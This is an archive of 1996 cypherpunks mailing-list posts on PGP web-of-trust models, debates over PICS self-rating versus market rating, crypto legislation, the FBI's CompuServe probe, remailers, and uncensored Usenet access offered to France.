MIME-Version: 1.0
Content-Type: text/plain


> Actually, I've been thinking about this, and how do we *really* know that
> *anyone's* keys are actually theirs?  I'm new to this list and have been 
> collecting some of the keys from people who post with PGP signatures, but 
> even at that, I never certify them myself because I am not 100% absolutely
> certain that the key in question belongs to that person.  After all, what
> if some clever hacker dropped in and replaced someone's .plan file, or 
> edited their index.html file?  There's no real way to be absolutely 
> certain.

This is exactly what the web of trust is about.  The fact is that you
can't trust the Keyservers (they were never designed to be trusted);
you can't trust .plan files; you can't trust index.html files.
However you can trust signatures made by trusted keys.  That is why
the web of trust works.

For example, I've met in person with a lot of people and we've signed
each others' keys.  We've used various methods to "prove" identity.
Sometimes it's been a long time of personal interactions (close
friends).  Sometimes it's been a number of certifying documents, IDs,
etc.  Sometimes it's been a piece of knowledge that I know the other
has but no one else has.

The point is that once I'm attached to the web of trust I have a means
to verify other keys.  I can set up a CA that way (MIT has one) --
there is a keysigner that will use out-of-band means to verify the
identity of a user and then use that to sign a PGP key in that
person's name.

> How certain are we that the keyservers are 100% bulletproof?  Hell, I 
> could call Joe Schmoe up and say "tell me your fingerprint", but how do I 
> *really* know I'm talking to Joe unless I knew him before getting his 
> signature?  

As I said already, the keyservers are not bulletproof.  In fact, they
were never designed to be trusted.  They were designed to be an
untrusted key distribution system.  The end-user is still supposed to
verify the signatures on they keys received from the keyserver.

As for calling up Joe Schmoe, how did you get his number?  Did you
look it up in a phone book?  Call directory assistance?  These are
other means of identification, too.

You just need to look at it from a different angle.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 9 May 1996 08:27:34 +0800
To: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Subject: Re: misunderstandings of PICS
In-Reply-To: <9605072131.AA20062@rpcp.mit.edu>
Message-ID: <199605081817.LAA02530@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>>well, in any case the idea that there should ever be any pressure
>>of page designers to include certain tags I find wholly inconsistent
>>with the original PICS proposal and rather abhorrent. unfortunately
>>it may be unavoidable.
>
>        I understand at one level, but not the visceral response.
>

I see I should have been even more specific. what I mean is that
I think it is great to encourage page writers to include tags. what
I find somewhat abhorrent is pressure on them to include particular
tags that imply certain kinds of judgements. in other words, yes,
please use the tags. but don't pressure individuals by sending them
nasty email, "you should have included a sex: 10 tag in your page
and you didn't!! your page clearly has a sex: 10 value!! how can
you not do this!! I am going to email your administrator!! I hope
you get kicked out of cyberspace!!"

>>I am not against self-ratings, I'm just saying that they seem to
>>be the area most ripe for being misunderstood by the public, or
>>lead to undesirable situations, and this is already happening.
>
>        Then we should help educate the public. I dislike dumbing the net
>down for the masses.

me too. but as the cyberangels demonstrate, the public can easily
misunderstand virtually anything, esp. well written technical
proposals, and it takes a lot of effort to create a presentation
that is free of ambiguity.
>
>        The real question here -- as far as the public having a fit -- is
>the use of digital signatures in the labels. I expect we will not see
>signatures used in the first generation of label services or ?compliant?
>browsers. Just like ecommerce, it takes a break or catastrophe to get people
>to move in a constructful manner on the security front. 

yes, it is a bit disappointing how slowly digital signatures are catching
on in some ways and the herculean effort it will take to implement it
nicely.

this problem was particularly difficult with the rating system, because
you have multiple signatures: a signature by the creator and by the rater.
the rater signs not only his rating but links that signature to a
document signed by the author. (a sort of recursive signing.)

furthermore in electronic documents you often have pieces that are
altered and theoretically have to be signed by the transit mechanisms,
such as headers in email messages or newsgroup posts.

to fully implement digital signatures well in cyberspace
will be far from trivial. in some ways we don't have a very
robust ground to build on. for example, even though mail headers
are supposedly standardized there is still a lot of variation in the
way some clients treat the different fields (trivial example: not
correctly interpreting the reply-to, errors-to, etc.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Thu, 9 May 1996 09:41:34 +0800
To: cypherpunks@toad.com
Subject: Re: Transitive trust and MLM
Message-ID: <3190E8A7.6501A85@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm really glad to see this thread. I think this is a problem that is
well worth thinking about.

   I think what is really called for is a model of when keys are likely
to be bogus, and when signatures, etc., are likely to be correct. Before
going into the math, I'll go through some examples.

   Any key that's "well connected" in the MIT keyring is likely to be
good. Specifically, if it's signed by lots of people, and each of those
people is reachable from my trust root, then I'm pretty much willing to
believe the key is good.
   Unfortunately, there are a fair number of reasons why a key may be
bad. A really _cool_ thing to do with a compromised machine would be to
sign a big bunch of bogus keys. Given how easy it is to compromise a
machine, this is a very real worry. I don't know if this attack has been
realized yet, but it's best to assume it could be and will be.
   Another weakness is the "clueless user" who signs keys gotten from
the Net, or otherwise not properly verified.
   I don't claim to know all of the vulnerabilities, but I do think it
would be a good idea to quantify them before designing a key
distribution system.

    Hal calls into question the value of signed keys. To me, this points
to the pressing need for better manual verification of keys, by
communicating secure hashes through the phone and on physical channels,
including business cards. These channels are more secure than the Net,
are more convenient for all but the most hardcore net.heads, and would
actually work quite well, I think. But I do think it would be nice to
have access to "probably good" keys for casual e-mail. With luck, a
densely connected Web of manually obtained keys can serve as a good
foundation for the latter.

   Now for the mathematical model. Signatures can bind keys to e-mail
addresses, or act as assertions that the signed public key is trusted to
transitively sign other keys. Let's assume that each signature has a
certain probability p of being good, and a 1-p probability of being
bogus, and that all probabilities are independent. These are probably
bad assumptions in the real world, but that's the difference between
theory and practice.
   Now we can actually evaluate the probability of a given key being
good. Consider a Monte Carlo process in which each edge in the graph is
present with probability 1-p. For each run, we determine whether the
recipient's public key (actually the binding between public key and
recipient's e-mail address) is reachable from our trust root. The
probability over a large number of runs is (given our assumptions) the
probability of the key being good.
   One encouraging consequence of this model is that densely connected
subgraphs can result in highly trusted keys even if p itself is quite
small. In a clique of size k, the trust is (very) roughly 1-(1-p)^k. For
example, if p is a mere 50%, then in a clique of size 10, each key in
the clique is trusted with a probability of 99.9%.
   This computation is (I think) known as the network reachability
problem, and is probably quite hard to evaluate. In practice, you'd
probably want to compute upper and lower bounds instead,

   Let's see if we can come up with a model that preserves this property
of giving high trust values to densely connected keys, yet is also
highly resistant to (some plausible model) of attacks against the Web of
trust.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 9 May 1996 09:31:06 +0800
To: tcmay@got.net (Timothy C. May)
Subject: self-ratings vs. market ratings
In-Reply-To: <adb61de708021004cef3@[205.199.118.202]>
Message-ID: <199605081856.LAA06645@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM
>Should "voluntary self-criticism" become widespread, I expect to rate all
>of my posts as suitable for children of all ages, suitable for
>hypersensitive feminists, suitable for Jews and Gentiles alike, and so on.
>Regardless of whether I'm advocating post-birth abortions or forced
>encheferation of Muslim girls.

heh. I had a feeling you or someone else would would say this.

as I wrote, I don't like the self-rating idea very much for the reasons
you bring up and because of the pressure on authors to rate their material
in certain ways. but I can see how self-ratings might coexist with a
market rating system.

>I believe the whole debate about PICs-type ratings and other "voluntary
>self-labeling" has taken us astray.

whoa, keep in mind that PICS involves "market ratings" as well. in my
mind this is the key part of the proposal and most important element
as I have been writing.  although others have suggested they saw 
it exactly the opposite. we will see what happens in practice.

>I don't see calls for authors to voluntarily self-rate their print works,
>nor do I see calls for newspapers to have articles rated.

in a sense this happens at the beginning of works. recall in Huck Finn
how Mark Twain warned against what people should not read the book.
columnists will sometimes say, "this is about [x], don't read it if
you don't like [x]". but I agree it is somewhat silly at times for authors
to rate their articles. but keep in mind we are using the word
"ratings" in a very general sense. it makes total sense for authors
to decide the "keywords" for their articles, for example-- and in 
the PICS rating system, such a use is possible.

>I say it's a waste of our time to even be thinking or worrying about how to
>implement an infrastructure for ratings.

hmmmmmmmm, I seem to recall earlier letters in which you advocated 
a market-type rating system in which services could rate things,
in the way that stocks are now rated, doctors/lawyers
could be rated, etc.-- let a thousand ratings services bloom.
(or maybe we were talking about reputations. in my mind, they are
mostly interchangeable--hence my interest in "rating" systems).

perhaps in the future people should be very careful to distinguish their
opinions on "self-ratings" vs. "market ratings" because people seem
to be conflating the two and have widely divergent opinions. also I 
want the reader to keep in mind that PICS supports both (and therefore
to criticize it on the ground of one alone is not wholly sensible).

I point out that market ratings exist and are everywhere around us.
a credit rating is in fact a kind of "market rating" in the sense I 
am using the word-- rating of some "thing" or "person" by another 
entity.

 In fact, building such an
>infrastructure could make later imposition of "mandatory voluntary ratings"
>(Orwell would be unsurprised) a greater likelihood.

my fear too. hopefully, designers can try to oppose it in their
writings ala the Bill of Rights. but it is always the case that powerful
technology capable of great good can be twisted into great evil
by the evilminded.

if the system is always championed as voluntary by definition, I can't
see too many sinister scenarios taking place. the problem would be
if people gradually lost this understanding over time. unfortunately
there is ample precedent for that kind of thing again in our government,
where the concept of "of, by, and for the people" seems to have become
blurry, to say the least.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay.Olbon@dynetics.com (Clay Olbon II)
Date: Thu, 9 May 1996 07:37:09 +0800
To: "Joseph M. Reagle Jr." <vznuri@netcom.com>
Subject: Re: misunderstandings of PICS
Message-ID: <v01540b00adb6739de4bc@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:31 PM 5/7/96, Joseph M. Reagle Jr. wrote (in part):
>>my fear is that the supposed "failure" of self-ratings could be twisted
>>by its opponents as evidence that it is inadequate to deal with the
>>real problem.
>
>        I think your fears are a little too paranoid here, but maybe they
>aren't. The question is how much of this hoopola stems from fundamentalist
>thought police, or concerned but ignorant parents/congressmen. If
>self-labeling worked (which I see few cases in which it wouldn't) I can't
>see the concerned but ignorant being unhappy. Rather they'd be a bit better
>educated and feeling pretty secure their kids won't get their hands on
>naughty material. And then if self labeling had some failures, that's an
>incentive for others to provide third party services (as others have
>argued). PICS had to sell itself to the net as much as to the masses.
>Self-labeling appeals to the net, it may appeal to the masses, but there are
>other things in there to sweeten the deal for them if not.

I disagree - paranoia is warranted here.  One problem with our legislative
process is that is is vulnerable to emotional issues.  It is very easy to
bring up issues that sound horrible (child porn, terrorist info, flag
burning), then create legislation controlling them.  Being opposed to this
legislation for whatever reason brands you as "anti-family" or "soft on
crime".  It is clear to me that improperly labeled material will be paraded
before congress and the media as justification for stricter control over
this material.  Congressmen, not wanting to face attack ads claiming that
they support pornography (or terrorism, or whatever), will pass silly laws
such as the CDA.  It has happened before, it is naive to think that it will
not happen again.  There are only three solutions:

        1)  Vote in congressmen that support the first amendment.
        2)  Hope that judges protect our rights.
        3)  Deploy technological solutions that make any laws passed
            ineffectual.

The first solution is improbable and the second is risky.  Only the third
solution actually provides a method where we can really have an impact.  I
think PICS is a great idea, and I think it may have an impact on judicial
decisions.  It should be implemented because it puts the control over
information where it belongs, in the hands of the end-user.  I would hope
that it is a good-enough solution to avoid further control over the
internet, but I have my doubts.  Remember, if congress can try and
legislate against something as innocuous as flag burning, what else would
they be willing to do to curb our right to free speech?

        Clay

---------------------------------------------------------------------------
Clay Olbon II            | Clay.Olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: on web page
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
                     TANSTAAFL
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 9 May 1996 09:46:50 +0800
To: "'cypherpunks@toad.com>
Subject: RE: self-ratings vs. market ratings
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960508194708Z-15104@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Vladimir Z. Nuri (in response to Tim May)
>
>hmmmmmmmm, I seem to recall earlier letters in which you advocated 
>a market-type rating system in which services could rate things,
>in the way that stocks are now rated, doctors/lawyers
>could be rated, etc.-- let a thousand ratings services bloom.
>(or maybe we were talking about reputations. in my mind, they are
>mostly interchangeable--hence my interest in "rating" systems).
.....................................................................

In consideration of the difference between "ratings" and "reputation":

I think of a rating as something which is attached to something
"pre-knowledge", whereas a reputation is something which develops over
time & based upon informed knowledge ("after-knowledge").

A rating is applied to something (a service or whatever) by only those
few individuals who are acquainted with what they are rating.

A reputation is accumulated by the impressions made upon larger numbers
of individuals - a general population not necessarily employed to
collect these impressions - but who have nevertheless sufficient
exposure to and acquaintanceship with the person/service/etc. to make an
informed conclusion about it.  

A rating can make a statement on what something "is" or is expected to
be (eg, general in content vs explicitly sexual), where a reputation
reflects on past behavior.

    ..
Blanc







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 9 May 1996 12:22:21 +0800
To: cypherpunks@toad.com
Subject: HAVE YOU HAD YOUR (TAX) BREAK TODAY?
Message-ID: <2.2.32.19960508195420.0071aa04@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

As of 1 May, there is yet another reason to do your offshore
business in Liechtenstein.  On that date the country's first
McDonald's opened in the town of Treisen.  Liechtenstein is
the 95th country to have a McDonald's.

It was not reported whether or not the Princely family was
at the VIP party that marked the gala opening, or if mutual
recognition would be exchanged with McDonaldland.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.) (by way of "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>)
Date: Thu, 9 May 1996 09:07:01 +0800
To: cypherpunks@toad.com
Subject: FBI probes CompuServe adult programming
Message-ID: <9605081845.AA29915@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



                                         
        COLUMBUS, Ohio, May 8 (UPI) -- The FBI, acting on a complaint from a  
Christian morals watchdog group, Wednesday sought to determine whether 
CompuServe Inc. has violated a new law against indecency. 
        FBI agents said they were attempting to determine whether  
CompuServe's Entertainment Drive, which contains some adult material, 
violates the Communications Decency Act. The law prohibits offering 
pornography to on-line users, especially minors. 
        CompuServe, headquartered in Upper Arlington, noted parents can now  
block their children from reaching any adult-oriented content. Users 
must use a password to reach certain restricted areas. 
        ``At this time we are not doing anything,'' CompuServe spokeswoman  
Daphne Kent told the Columbus Dispatch. ``We cooperate fully with any 
law enforcement agency, but we have not had talks with (the FBI) at this 
time.'' 
        The FBI started the investigation after the Justice Department  
determined a complaint from the American Family Association had merit. 
        A spokesman said American Family made CompuServe a target because the  
on-line service is one of the world's largest such businesses and offers 
sexually oriented content. 
        American Family, based in Tupelo, Miss., also objects to CompuServe's  
MacGlamour Forum, which contains adult pictures and movies. 
                






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Thu, 9 May 1996 12:47:59 +0800
To: cypherpunks@toad.com
Subject: Re: ecash payee anonymity, cpunk archives
In-Reply-To: <199605072236.RAA02543@proust.suba.com>
Message-ID: <4mr5ad$4ia@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199605072236.RAA02543@proust.suba.com>,
Alex Strasheim  <alex@proust.suba.com> wrote:
>A while back someone posted a note saying that an ecash protocol
>garaunteeing payee as well as payer anonymity had been devised.
>
>Did that ever get posted here?  The last message I saw said that it would 
>be posted soon.

I don't recall if an "official" explanation of the protocol got posted here,
but it's being discussed in another thread (search for "moneychangers").

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZEYg0ZRiTErSPb1AQFHSwP8D+sHW+SXTWrnOmHEdgzU9+qYBjaHktjz
pdXIY6eQ+/vbnEdpLle04KYrJf1GA2l0Ind6CxiVwCX442bX4JLYvfoEEkieheJS
NVkDPWfT5rfItrznB49DJ5EC//QjQg8+AhUKLpfRFO0wxIMnTPfVfVkLZBQ820E0
3O0A5PkcfEg=
=AIhA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Thu, 9 May 1996 15:55:27 +0800
To: cypherpunks@toad.com
Subject: Re: Transitive trust
Message-ID: <Pine.BSF.3.91.960508152010.283A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


Submitted for your (dis)approval...

-----BEGIN PGP SIGNED MESSAGE-----

> And beliefs are in some sense what we are really talking about. There is no
> simple scalar quantity called "trust" (at least not one I can imagine), but
> different agents will have different beliefs about different things. One
> set of beliefs about signatures on keys has a lot of similarities to the
> "web of trust." In fact, imagine this "diminishing wavefront of belief"
[butchered for brevity]
> Can this be more mechanized? Can numbers be attached, and perhaps
> propagated? (I mentioned "diminishing wavefront of belief," because
> implicit in this viewpoint, inevitably (and rightly, I think), is the
> notion that "distant relations" have low probabilities of belief, all other
> things being equal.

I think we need to make a distinction between belief in identity and trust
in competence. Currently, signing a key *only* means that you believe that
the person is who they say they are. It should also be possible to state
that you believe a person is competent enough to use proper care when
signing other keys.

Obviously, you wouldn't competence-sign someone's key unless you've known 
them for quite some time. The "competence web-of-trust" would grow very 
slowly. This competence-web-of-trust would have to remain tightly-knit, 
as you wouldn't want to trust anyone more than a couple links down the 
chain.

While the web-of-competence would grow slowly, this small group of people 
could identity-sign a lot of keys.

I know this might sound a bit like a hierarchical structure of trusted 
people (which it *could* be) it's really more like a web, and anyone 
could create their own web-of-competence, and the webs could eventually 
be linked together.

Creating a web-of-competence would take a long time, and a lot of effort. 
But, signing could actually become a paid service, which would give people 
incentive to gain trust (by being paranoid when it comes to key signing). 
The most widely trusted people could charge significant amounts of money 
for the time needed to verify a person's credentials. Of course, there 
aren't currently many people out there worth paying an arm and a leg to 
get them to sign your key, but I could see people paying $5-$500 to have 
their key identity-signed by someone like PRZ.

Having a key competence-signed by someone like PRZ would obviously cost a
lot more than identity-signing, since it would take a lot more time to
gain that much trust. It would not be unlike paying for an education, and
with identity-signings being worth $5-$500 or more, it could be a
worthwhile investment. Having a key competence-signed by more than one
person would increase the value of your key, and once there are a couple
good signatures on your key, other people would be more willing to
competence-sign it, because there would be less risk involved (risk to
their reputation).

There would probably have to be more than one level of competence signing.
It should be possible to say "I trust this person to use care when
identity-signing other keys", and it should also be possible to say "I
trust this person to use care when competence-signing other keys". That
second type of signature would be *very* valuable, and it would be
necessary to have that and possibly even higher levels of trust in order
to make the web-of-competance a reasonably large size. 

When you sign a key, you are placing your reputation on the line, so you 
must be certain that the level of trust you're placing is appropriate. 
But what happens when someone goes rogue and ignores credentials, and 
signs keys of anyone who is willing to pay the price? You would regret 
signing the rogue person's key. So, IT SHOULD BE POSSIBLE TO REVOKE 
TRUST, in order to protect your own reputation.

PGP currently only allows a person to revoke their own key. Most people 
would revoke their key if it were stolen, to protect their own 
reputation. However, some people may be unwilling or unable to revoke 
their own key, and if you signed that key, your reputation may be 
affected. Clearly, it should be possible to remove your signature from 
someone's key.

Revoking trust has it's own little problem: Some people might accept cash
and sign a key, then revoke the trust in the key, keeping the cash. 
Easily fixed: the people who have signed the con man's key could revoke
the trust in that key, bringing an abrupt end to the con man's 
key-signing days.

What it all comes down to is reputation. Protect your reputation, and 
you could make a living on your reputation alone.


======================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)     |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/  |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E6 8C09EC52443F8830 |
|               -- Disclaimer: JMHO, YMMV, IANAL. --                 |
====================================================================:)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEVAwUBMZEckdtVWdufMXJpAQFSwAgAnhCALlQdfyYJ+Cp3WSXqMiOLG8ubtFJB
jUWyXyd3T0u8RxwraIq4emxW4HZZNMBNKet4rZzkA9VqAZ3+p9337jUS6XBuE56V
IRLhQy80TyrqwQVpSKXXOmPlZdmhzAF/OJE4LZF4gMh5RIANFTUXzBkVSJ8FsB1C
KXjgzk1E+5hdQ0FrwaAc9LIrq6UokhO7pIKb5tlmntXHhtDm+yLpm5QvrCxwnBad
3KlxAtWvQYVQTb5a9bhgnFXVRDjh/lQ1bxncJ1ap1oJP0E6nMfHq282G8UxnrUuY
qyksNGJDgWElExzXKntdyqP+bOiIn4jwVyjBcrBZS9V3GxWOPZz4ew==
=Z66X
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 9 May 1996 15:40:15 +0800
To: cypherpunks@toad.com
Subject: IP network #s in france
Message-ID: <199605082309.QAA15108@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Anyone have a list of all the ip network #s in France? It
would be most appreciated.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 9 May 1996 15:30:00 +0800
To: cypherpunks@toad.com
Subject: Leahy bill dead?
Message-ID: <199605082328.QAA06492@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Maybe this seems a bit redundant, but is it generally agreed "out there" 
that the Leahy bill is dead?  

When originally proposed, the conventional wisdom around here was that the 
Clinton Maladministration was going to be dead-set against it. (Not a bad 
guess...)  It was also claimed that it couldn't be changed to fix it.  
(although one of the nyms that claimed this hasn't been seen around here 
since then...)    Since then, most if not all of the people and groups who 
might otherwise have been in favor of it have, likewise, turned against it.  
And while the Burns bill isn't totally out of the woods, I assume "we" (the 
people on the right side of the cryto argument)  can all agree that it is at 
least better than Leahy's booby-trap.  

So does that spell the end of the Leahy bill?  The reason I mention this is 
because it was my suspicion that, contrary to conventional wisdom, the 
"anti-crypto" faction designed the Leahy bill to be as anti-crypto as they 
felt they could pass, including just enough bait to get us to take the hook. 
 Obviously, that tactic failed.  However, if I'm right we'll seem some life 
in the carcass yet.

Obviously, this is a highly longshot prediction.  "Nobody" is supposed to be 
for the Leahy bill now.  But I'm reminded of the last 20 minutes of the 
movie, "Terminator"...



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rick hoselton <hoz@univel.telescan.com>
Date: Thu, 9 May 1996 14:10:50 +0800
To: cypherpunks@toad.com
Subject: Re: self-ratings
Message-ID: <199605082327.QAA26350@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
>Should "voluntary self-criticism" become widespread, I expect to rate all
>of my posts as suitable for children of all ages, suitable for
>hypersensitive feminists, suitable for Jews and Gentiles alike, and so on.
>Regardless of whether I'm advocating post-birth abortions or forced
>encheferation of Muslim girls.

Not me.  If someone doesn't want to be offended, then I would rather they 
never read anything from me, ever.  I share family, race, culture, and 
backround with my father, and there have been times when I offended him 
unintentionally.  One person liked me enough to marry me, but I occasionally 
offended her, too.  Imagine how easily I might offend a stranger.  Better to 
take no chances at all.  If somebody wants a rating system, then they should
just 
consider everything I have to say as "X-rated" in EVERY category, just to be
safe.  
And that's a policy that everyone on the net should follow.  If this self
rating 
system becomes mandatory, I think the cypherpunks should cooperate fully, by 
notifying ALL sites that are not self-X-rated if they can find ANYTHING that 
ANYONE might EVER find offensive.  Better safe than sorry.  Nobody will be 
prosecuted for saying they have an offensive site, even if they don't.  Imagine 
a prosecutor trying to prove that NOBODY could POSSIBLY be offended by my 
newsgroup postings!  But many people will be prosecuted for not identifying 
their sites as offensive.  

Now, if everyone follows my advice, the net may become very boring for those 
who have their filters set on, but congress will NEVER make "being boring" 
against the law.  If mandatory-self-rating ever becomes the law, cypherpunks 
can definitely promote true justice by strictly interpreting it and supporting 
it completely.  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 9 May 1996 14:45:51 +0800
To: cypherpunks@toad.com
Subject: Re: remailer-in-a-box
Message-ID: <199605082339.QAA26674@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 3:51 PM 5/7/96, anonymous-remailer@shell.portal.com wrote:
>>No one answered me.
>>What's the best remailer-in-a-box.
>>I'd like to run one.  I would think people would be falling
>>over eachother to tell me.

I was running a modified ghio2-based remailer until I shut it down
because of spammers.  You should be able to get the code off my
web page, or send me email and I'll forward it.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Thu, 9 May 1996 15:15:34 +0800
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION ANNOUNCES UNCENSORED USENET ACCESS TO THE FRENCH INTERNET COMMUNITY
Message-ID: <199605082348.QAA05536@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release - May 9, 1996
Contact: Sameer Parekh 510-601-9777x3

	COMMUNITY CONNEXION ANNOUNCES UNCENSORED USENET ACCESS TO
		    THE FRENCH INTERNET COMMUNITY

Berkeley, CA - Community ConneXion, Inc., today announced that it will
for a limited time offer free Usenet access to anyone in France.

The announcement comes in the wake of the arrest of two managers for
French Internet service providers. The two managers at WorldNet and
FranceNet are being held responsible for the pornographic material
distributed on the "alt.binaries" newsgroups. They face up to three
years in jail.

In response to these arrests, the Association of French Internet
Professionals (AFPI) has called for a complete blackout of French
newsgroups and many providers in France have cut off news service
entirely. Community ConneXion, Inc., has announced free Usenet access
to the French in response to the resulting blackout.

"'The Internet views censorship as damage, and routes around it,'"
said Community ConneXion President Sameer Parekh, quoting a famous
saying on the net, "The Internet transcends national boundaries. This
promotion makes that fact obvious."

Community ConneXion offers full Internet access to its customers, with
no content-based restrictions on materials its customers may read or
make available on the Internet.

During this limited time promotion, people connected to the Internet
in France may access a full uncensored Usenet feed merely by pointing
their newsreaders at news.c2.net. People in other countries may also
get access to a full uncensored Usenet feed by purchasing service from
Community ConneXion. Information on how to sign up for service with
C2.NET is available at http://www.c2.net/.

Community ConneXion, Inc. is the leading provider of privacy on the
Internet.  Dedicated to uncompromising security, they provide
anonymous and pseudonymous Internet services, including secure web
services. Information is available at their web site at
http://www.c2.net/, or contact Sameer Parekh at 510-601-9777x3.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 9 May 1996 16:02:06 +0800
To: GovAccess@well.com
Subject: California AB3320 Regulating Internet Sales - Speier
Message-ID: <199605090019.RAA27557@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


ftp://www.leginfo.ca.gov/pub/bill/asm/ab_3301-3350/ab_3320_bill_960502_amend
ed_asm

Jackie Speier's at it again!  Now she's proposing AB3320, a bill to regulate
sales of goods and services to protect consumers on the Internet.
It's in its third revision, and much improved, but still obviously
doesn't get it - the bill talks a lot about physical delivery
of services or tangible goods (use or copying of information
appears to fall through the rather wide cracks here)
and providing written notices and toll-free telephone numbers,
not quite realizing that an electronic mail address would do fine.

The original bill was a proposal to require computer BBSs that
charge for their services to register with the State at a cost of $50.
It was marked up into a hybrid bill, and then into current form.

I'm not sure what Assemblymember Speier is trying to accomplish,
but she's clearly thrashing around trying to define it and do
_something_ helpful to consumers.  Those of you in her district may
wish to get in touch with her and help her understand the Net
and electronic commerce and international connectivity and such.
Alternatively, if your Senator or Assemblymember is on the
committee, you may want to talk to him/her.

Here's the current bill status, according to leginfo.


MEASURE :  A.B. No. 3320
AUTHOR(S)       :  Speier.
TOPIC   :  Telephone, mail order, and catalog sales: Internet.
HOUSE LOCATION  :  ASM
+LAST AMENDED DATE  :  05/02/96

LAST HIST. ACT. DATE:  05/06/96
LAST HIST. ACTION   :  Re-referred to Com. on  C.P.,G.E. & E.D.
COMM. LOCATION  :  ASM CONSUMER PRO., GOVT. EFFICIENCY, ECON. DEVELOPMENT
COMM. ACTION DATE   :  05/07/96
COMM. ACTION    :  Do pass as amended.
COMM. VOTE SUMMARY  :  Ayes:   09       Noes: 00        PASS
31 DAYS IN PRINT        :  03/26/96

TITLE   :  An act to amend Section 17538 of the Business and
        Professions Code, relating to sales.


=======
Here's a quote some of you privacy supporters may enjoy....
(The {- -} and {+ +} are some kind of addition/deletion markup.)
===============

   (d) Any {- person -} {+ vendor +} subject to this section who uses
the Internet to conduct sales or leases of goods or services shall
provide {- an -} {+ a conspicuous +} on-screen notice that discloses
the procedures for resolving billing, sales, and service disputes,
including the {- person's -} {+ vendor's +} return policy, {- and -}
the address where the {- person -} {+ vendor +} may be contacted {+ ,
and a toll-free telephone number or other cost-free method to
communicate the buyer's request for a full refund.
   Any vendor conducting business from an electronic e-mail or other
electronic address shall disclose the legal name and address of that
business in writing on any transaction form provided to the buyer +}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cs.berkeley.edu>
Date: Thu, 9 May 1996 17:12:54 +0800
To: coderpunks@toad.com
Subject: "Architectural considerations for cryptanalytic hardware" paper on the web
Message-ID: <199605090024.RAA00415@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

